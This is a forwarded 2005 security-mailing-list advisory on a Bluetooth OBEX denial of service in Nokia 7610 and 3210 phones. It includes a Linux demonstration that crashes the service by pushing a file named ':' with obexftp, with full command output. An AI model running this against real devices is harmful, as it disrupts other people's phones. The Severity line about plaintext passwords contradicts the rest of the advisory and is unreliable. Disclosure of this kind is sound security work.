---------- Forwarded message ---------- From: Franckl MobiBug To: mobibug Date: Wed, 8 Feb 2006 16:10:40 +0100 Reply-To: Security Mailing List Subject: [Mobibug] Nokia 3210 And 7610 Remote OBEX Denial Of Service Vulnerability *#*#*#*#*#*#*#*#* MobiBug Security Mailing List #*#*#*#*#*#*#*#*#* Title: Nokia 3210 And 7610 Remote OBEX Denial Of Service Vulnerability Release Date: 09/26/2005 Vulnerability Type: Failure to handle exceptional conditions Severity: Low, a local attacker can view server passwords in plain text. Affected terminals: Nokia 7610 / Nokia 3210 Auth: http://www.nokia.com Disclaimer: ========== The information is provided "as is" without warranty of any kind. The author of this issue shall not be held liable for any damages due to the informations contained in this advisory. Vulnerability Description: ========================= A remote denial of service vulnerability affects Nokia 3210 and 7610 phones. This issue is due to a failure of the operating system to handle certain filename characters in Bluetooth OBEX transfers. An attacker may leverage this issue to cause affected Nokia devices to fail to respond to further Bluetooth OBEX communications. Further communication likely fails until the affected phone is restarted. Due to code reuse among devices, other phones may also be affected. They are some flaw in the OBEX implementation in nokia 7610 (V4.0.437 15-09-04 RH51), and others, that disable this service if you send archive with name ":" or "\". ---- Quote of IROBEX12.pdf Pag:40, section 4.3 -- (OBEX specification) "Pushing objects into the inbox Objects are pushed into the inbox by using the PUT command with a Name header. The string in the Name header should not contain any path characters such as ?:?, ?/? or ?\?. Objects with improperly formed names should be rejected." ---- The device ask for PIN if you are not paired or ask if you want accept a connection of the remote box, you need ACCEPT. It have low risk , becouse dont work if you dont accept the incoming connection. If connection is established, the file is sended and they arent "New message arrived" message, like when you send correct archive. Its ok, the filename is dropped. The problem is the OBEX service dont work anymore after this, if you tried to send other file or from some vcard from other device, you cant connect to the remote OBEX service again. Demostration with Linux as client: jim:# hcitool scan Scanning ... 00:13:70:5E:1F:01 7610 jim:# obexftp -b 00:13:70:5E:1F:01 -p \: Browsing 00:13:70:5E:1F:01 ... Channel: 10 No custom transport obexftp_cli_open() obexftp_cli_connect_uuid() Connecting...obexftp_cli_connect_uuid() BT 1 cli_sync_request() obexftp_sync() client_done() client_done() Found connection number: -1022384746 client_done() Sender identified obexftp_sync() OBEX_HandleInput = 31 obexftp_sync() Done success=1 done Sending ":"... obexftp_put_file() Sending : -> : build_object_from_file() Lastmod = 2005-09-18T00:16:42Z cli_sync_request() cli_fillstream_from_file() cli_fillstream_from_file() Read 6 bytes cli_fillstream_from_file() cli_fillstream_from_file() Read 0 bytes obexftp_sync() obexftp_sync() OBEX_HandleInput = 0 failed: : obexftp_cli_disconnect() Disconnecting...cli_sync_request() failed: disconnect obexftp_cli_close() # Error pushing other file after send ":" filename: jim:# obexftp -b 00:13:70:5E:1F:01 -p /etc/hosts Browsing 00:13:70:5E:1F:01 ... Channel: 10 No custom transport obexftp_cli_open() obexftp_cli_connect_uuid() Connecting...obexftp_cli_connect_uuid() BT -1 failed: connect Still trying to connect obexftp_cli_connect_uuid() Connecting...obexftp_cli_connect_uuid() BT -1 failed: connect Still trying to connect obexftp_cli_connect_uuid() Connecting...obexftp_cli_connect_uuid() BT -1 failed: connect Still trying to connect ------------------------------------------------------------------------ ---------------------------------- Timeline: 20 Sept 2005: bug found. 21 Sept 2005: Nokia security contacted. 24 Sept 2005: Disclosure in NCN - V congress (http://www.noconname.org). 26 Sept 2005: Full disclosure. Credits: ======== Alejandro Ramos #*#*#*#*#*#*#*#*#* MobiBug Security Mailing List #*#*#*#*#*#*#*#*#*